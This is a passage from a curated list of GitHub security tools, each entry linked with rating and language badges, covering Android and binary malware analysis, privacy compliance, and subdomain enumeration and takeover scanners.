> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/kelvinBen/AppInfoScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/kelvinBen/AppInfoScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/kelvinBen/AppInfoScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/kelvinBen/AppInfoScanner?style=flat-square)
- https://github.com/maaaaz/androwarn - **Yet another static code analyzer for malicious Android applications**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/maaaaz/androwarn?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/maaaaz/androwarn?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/maaaaz/androwarn?style=flat-square) ![GitHub](https://img.shields.io/github/license/maaaaz/androwarn?style=flat-square)
- https://github.com/quark-engine/quark-engine - **Android Malware (Analysis | Scoring) System**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/quark-engine/quark-engine?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/quark-engine/quark-engine?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/quark-engine/quark-engine?style=flat-square) ![GitHub](https://img.shields.io/github/license/quark-engine/quark-engine?style=flat-square)
- https://github.com/droidefense/engine - **Advance Android malware analysis framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/droidefense/engine?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/droidefense/engine?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/droidefense/engine?style=flat-square) ![GitHub](https://img.shields.io/github/license/droidefense/engine?style=flat-square)
- https://github.com/abhi-r3v0/Adhrit - **Android Security Suite for in-depth reconnaissance and static bytecode analysis based on Ghera benchmarks**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/abhi-r3v0/Adhrit?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/abhi-r3v0/Adhrit?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/abhi-r3v0/Adhrit?style=flat-square) ![GitHub](https://img.shields.io/github/license/abhi-r3v0/Adhrit?style=flat-square) <img alt="BlacHatUSA-arsenal-2022" src="./badges/BlackHatUSA--arsenal-2022-blue.svg">
- https://github.com/pascal-lab/Tai-e - **An easy-to-learn/use static analysis framework for Java, especially for Android**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/pascal-lab/Tai-e?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/pascal-lab/Tai-e?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/pascal-lab/Tai-e?style=flat-square) ![GitHub](https://img.shields.io/github/license/pascal-lab/Tai-e?style=flat-square)
- https://github.com/Cyber-Buddy/APKHunt - **A comprehensive static code analysis tool for Android apps that is based on the OWASP MASVS framework**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Cyber-Buddy/APKHunt?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Cyber-Buddy/APKHunt?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Cyber-Buddy/APKHunt?style=flat-square) ![GitHub](https://img.shields.io/github/license/Cyber-Buddy/APKHunt?style=flat-square)
### Binary Executables Analysis
- https://github.com/m4rco-/dorothy2 - **A malware/botnet analysis framework written in Ruby**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/m4rco-/dorothy2?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/m4rco-/dorothy2?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/m4rco-/dorothy2?style=flat-square) ![GitHub](https://img.shields.io/github/license/m4rco-/dorothy2?style=flat-square)
- https://github.com/Tencent/HaboMalHunter - **Used for automated malware analysis and security assessment on the Linux system**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Tencent/HaboMalHunter?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Tencent/HaboMalHunter?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Tencent/HaboMalHunter?style=flat-square) ![GitHub](https://img.shields.io/github/license/Tencent/HaboMalHunter?style=flat-square)
- https://github.com/KeenSecurityLab/BinAbsInspector - **Static analyzer for automated reverse engineering and scanning vulnerabilities in binaries**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/KeenSecurityLab/BinAbsInspector?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/KeenSecurityLab/BinAbsInspector?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/KeenSecurityLab/BinAbsInspector?style=flat-square) ![GitHub](https://img.shields.io/github/license/KeenSecurityLab/BinAbsInspector?style=flat-square)
- https://github.com/fkie-cad/cwe_checker - **Static analyzer for detecting common bug classes such as buffer overflows in binaries**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Rust-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/fkie-cad/cwe_checker?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/fkie-cad/cwe_checker?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/fkie-cad/cwe_checker?style=flat-square) ![GitHub](https://img.shields.io/github/license/fkie-cad/cwe_checker?style=flat-square)
- https://github.com/airbus-seclab/bincat - **Binary code static analyser, with IDA integration. Performs value and taint analysis**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/airbus-seclab/bincat?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/airbus-seclab/bincat?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/airbus-seclab/bincat?style=flat-square) ![GitHub](https://img.shields.io/github/license/airbus-seclab/bincat?style=flat-square)
### Privacy Compliance
- https://github.com/riskscanner/riskscanner - **Multi-cloud privacy compliance scanning platform, through Cloud Custodian's YAML DSL to define scanning rules**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/riskscanner/riskscanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/riskscanner/riskscanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/riskscanner/riskscanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/riskscanner/riskscanner?style=flat-square)
- https://github.com/momosecurity/bombus - **Enterprise security and privacy compliance platform**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/momosecurity/bombus?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/momosecurity/bombus?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/momosecurity/bombus?style=flat-square) ![GitHub](https://img.shields.io/github/license/momosecurity/bombus?style=flat-square)
### Subdomain Enumeration or Takeover
- https://github.com/lijiejie/subDomainsBrute - **A classical subdomain enumeration Tool by lijiejie**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lijiejie/subDomainsBrute?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lijiejie/subDomainsBrute?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lijiejie/subDomainsBrute?style=flat-square) ![GitHub](https://img.shields.io/github/license/lijiejie/subDomainsBrute?style=flat-square)
- https://github.com/ring04h/wydomain - **A Speed and Precision subdomain enumeration Tool by ringzero**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ring04h/wydomain?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ring04h/wydomain?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ring04h/wydomain?style=flat-square) ![GitHub](https://img.shields.io/github/license/ring04h/wydomain?style=flat-square)
- https://github.com/le4f/dnsmaper - **Subdomain enumeration tool with map record**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/le4f/dnsmaper?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/le4f/dnsmaper?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/le4f/dnsmaper?style=flat-square) ![GitHub](https://img.shields.io/github/license/le4f/dnsmaper?style=flat-square)
- https://github.com/TheRook/subbrute - **A DNS meta-query spider that enumerates DNS records, and subdomains,supported API**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TheRook/subbrute?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TheRook/subbrute?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TheRook/subbrute?style=flat-square) ![GitHub](https://img.shields.io/github/license/TheRook/subbrute?style=flat-square)
- https://github.com/We5ter/GSDF - **Subdomain enumeration via Google certificate transparency**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/We5ter/GSDF?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/We5ter/GSDF?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/We5ter/GSDF?style=flat-square) ![GitHub](https://img.shields.io/github/license/We5ter/GSDF?style=flat-square)
- https://github.com/mandatoryprogrammer/cloudflare_enum - **Subdomain enumeration via CloudFlare**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/mandatoryprogrammer/cloudflare_enum?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/mandatoryprogrammer/cloudflare_enum?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/mandatoryprogrammer/cloudflare_enum?style=flat-square) ![GitHub](https://img.shields.io/github/license/mandatoryprogrammer/cloudflare_enum?style=flat-square)
- https://github.com/guelfoweb/knock - **Knock subdomain scan**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/guelfoweb/knock?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/guelfoweb/knock?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/guelfoweb/knock?style=flat-square) ![GitHub](https://img.shields.io/github/license/guelfoweb/knock?style=flat-square)
- https://github.com/exp-db/PythonPool/tree/master/Tools/DomainSeeker - **An intergratd Python subdomain enumeration tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/exp-db/PythonPool?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/exp-db/PythonPool?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/exp-db/PythonPool?style=flat-square) ![GitHub](https://img.shields.io/github/license/exp-db/PythonPool?style=flat-square)
- https://github.com/code-scan/BroDomain - **Find brother domain**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/code-scan/BroDomain?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/code-scan/BroDomain?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/code-scan/BroDomain?style=flat-square) ![GitHub](https://img.shields.io/github/license/code-scan/BroDomain?style=flat-square)
- https://github.com/chuhades/dnsbrute - **A fast domain brute tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/chuhades/dnsbrute?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/chuhades/dnsbrute?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/chuhades/dnsbrute?style=flat-square) ![GitHub](https://img.shields.io/github/license/chuhades/dnsbrute?style=flat-square)
- https://github.com/yanxiu0614/subdomain3 - **A simple and fast tool for bruting subdomains**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/yanxiu0614/subdomain3?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/yanxiu0614/subdomain3?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/yanxiu0614/subdomain3?style=flat-square) ![GitHub](https://img.shields.io/github/license/yanxiu0614/subdomain3?style=flat-square)
- https://github.com/michenriksen/aquatone - **A powerful subdomain tool and domain takeovers finding tools**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/michenriksen/aquatone?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/michenriksen/aquatone?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/michenriksen/aquatone?style=flat-square) ![GitHub](https://img.shields.io/github/license/michenriksen/aquatone?style=flat-square)
- https://github.com/evilsocket/dnssearch - **A subdomain enumeration tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/evilsocket/dnssearch?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/evilsocket/dnssearch?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/evilsocket/dnssearch?style=flat-square) ![GitHub](https://img.shields.io/github/license/evilsocket/dnssearch?style=flat-square)
- https://github.com/reconned/domained - **Subdomain enumeration tools for bug hunting**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/reconned/domained?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/reconned/domained?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/reconned/domained?style=flat-square) ![GitHub](https://img.shields.io/github/license/reconned/domained?style=flat-square)
- https://github.com/bit4woo/Teemo - **A domain name & Email address collection tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/bit4woo/Teemo?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/bit4woo/Teemo?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/bit4woo/Teemo?style=flat-square) ![GitHub](https://img.shields.io/github/license/bit4woo/Teemo?style=flat-square)
- https://github.com/laramies/theHarvester - **E-mail, subdomain and people names harvester**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/laramies/theHarvester?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/laramies/theHarvester?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/laramies/theHarvester?style=flat-square) ![GitHub](https://img.shields.io/github/license/laramies/theHarvester?style=flat-square)
- https://github.com/nmalcolm/Inventus - **A spider designed to find subdomains of a specific domain by crawling it**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/nmalcolm/Inventus?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/nmalcolm/Inventus?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/nmalcolm/Inventus?style=flat-square) ![GitHub](https://img.shields.io/github/license/nmalcolm/Inventus?style=flat-square)
- https://github.com/aboul3la/Sublist3r - **Fast subdomains enumeration tool for penetration testers**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/aboul3la/Sublist3r?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/aboul3la/Sublist3r?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/aboul3la/Sublist3r?style=flat-square) ![GitHub](https://img.shields.io/github/license/aboul3la/Sublist3r?style=flat-square)
- https://github.com/jonluca/Anubis - **Subdomain enumeration and information gathering tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/jonluca/Anubis?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/jonluca/Anubis?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/jonluca/Anubis?style=flat-square) ![GitHub](https://img.shields.io/github/license/jonluca/Anubis?style=flat-square)
- https://github.com/n4xh4ck5/N4xD0rk - **Listing subdomains about a main domain**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/n4xh4ck5/N4xD0rk?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/n4xh4ck5/N4xD0rk?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/n4xh4ck5/N4xD0rk?style=flat-square) ![GitHub](https://img.shields.io/github/license/n4xh4ck5/N4xD0rk?style=flat-square)
- https://github.com/infosec-au/altdns - **Subdomain discovery through alterations and permutations**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/infosec-au/altdns?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/infosec-au/altdns?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/infosec-au/altdns?style=flat-square) ![GitHub](https://img.shields.io/github/license/infosec-au/altdns?style=flat-square)
- https://github.com/FeeiCN/ESD - **Enumeration sub domains tool,based on AsyncIO and non-repeating dict**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/FeeiCN/ESD?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/FeeiCN/ESD?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/FeeiCN/ESD?style=flat-square) ![GitHub](https://img.shields.io/github/license/FeeiCN/ESD?style=flat-square)
- https://github.com/UnaPibaGeek/ctfr - **Abusing certificate transparency logs for getting HTTPS websites subdomains**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/UnaPibaGeek/ctfr?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/UnaPibaGeek/ctfr?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/UnaPibaGeek/ctfr?style=flat-square) ![GitHub](https://img.shields.io/github/license/UnaPibaGeek/ctfr?style=flat-square)
- https://github.com/giovanifss/Dumb - **Dumain Bruteforcer, a fast and flexible domain bruteforcer**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Haskell-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/giovanifss/Dumb?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/giovanifss/Dumb?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/giovanifss/Dumb?style=flat-square) ![GitHub](https://img.shields.io/github/license/giovanifss/Dumb?style=flat-square)
- https://github.com/OWASP/Amass - **In-depth Attack Surface Mapping and Asset Discovery**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/OWASP/Amass?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/OWASP/Amass?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/OWASP/Amass?style=flat-square) ![GitHub](https://img.shields.io/github/license/OWASP/Amass?style=flat-square)
- https://github.com/Ice3man543/subfinder - **A subdomain discovery tool which has a simple modular architecture and has been aimed as a successor to sublist3r project**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Ice3man543/subfinder?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Ice3man543/subfinder?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Ice3man543/subfinder?style=flat-square) ![GitHub](https://img.shields.io/github/license/Ice3man543/subfinder?style=flat-square)
- https://github.com/Ice3man543/SubOver - **A powerful subdomain takeover tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Ice3man543/SubOver?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Ice3man543/SubOver?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Ice3man543/SubOver?style=flat-square) ![GitHub](https://img.shields.io/github/license/Ice3man543/SubOver?style=flat-square)
- https://github.com/janniskirschner/horn3t - **Powerful Visual Subdomain Enumeration**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/janniskirschner/horn3t?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/janniskirschner/horn3t?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/janniskirschner/horn3t?style=flat-square) ![GitHub](https://img.shields.io/github/license/janniskirschner/horn3t?style=flat-square)
- https://github.com/yunxu1/dnsub - **A high concurrency and cross platform subdomain scanner based on Golang**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/yunxu1/dnsub?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/yunxu1/dnsub?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/yunxu1/dnsub?style=flat-square) ![GitHub](https://img.shields.io/github/license/yunxu1/dnsub?style=flat-square)
- https://github.com/shmilylty/OneForAll - **An ultimate subdomains scanner integrated multiple subdomain scanning tools**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shmilylty/OneForAll?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shmilylty/OneForAll?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shmilylty/OneForAll?style=flat-square) ![GitHub](https://img.shields.io/github/license/shmilylty/OneForAll?style=flat-square)
- https://github.com/knownsec/ksubdomain - **A stateless and cross-platform subdomain enumeration tool, speed up to 30w/s on Mac and Windows, and 160w/s on Linux**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/knownsec/ksubdomain?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/knownsec/ksubdomain?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/knownsec/ksubdomain?style=flat-square) ![GitHub](https://img.shields.io/github/license/knownsec/ksubdomain?style=flat-square)
- https://github.com/gwen001/github-subdomains - **Find subdomains on GitHub**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/gwen001/github-subdomains?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/gwen001/github-subdomains?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/gwen001/github-subdomains?style=flat-square) ![GitHub](https://img.shields.io/github/license/gwen001/github-subdomains?style=flat-square)
- https://github.com/bit4woo/domain_hunter_pro - **Domain finder and Targets management, automated information collection, integrated with burpsuite**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/bit4woo/domain_hunter_pro?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/bit4woo/domain_hunter_pro?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/bit4woo/domain_hunter_pro?style=flat-square) ![GitHub](https://img.shields.io/github/license/bit4woo/domain_hunter_pro?style=flat-square)
- https://github.com/m4ll0k/takeover - **Sub-Domain TakeOver Vulnerability Scanner**
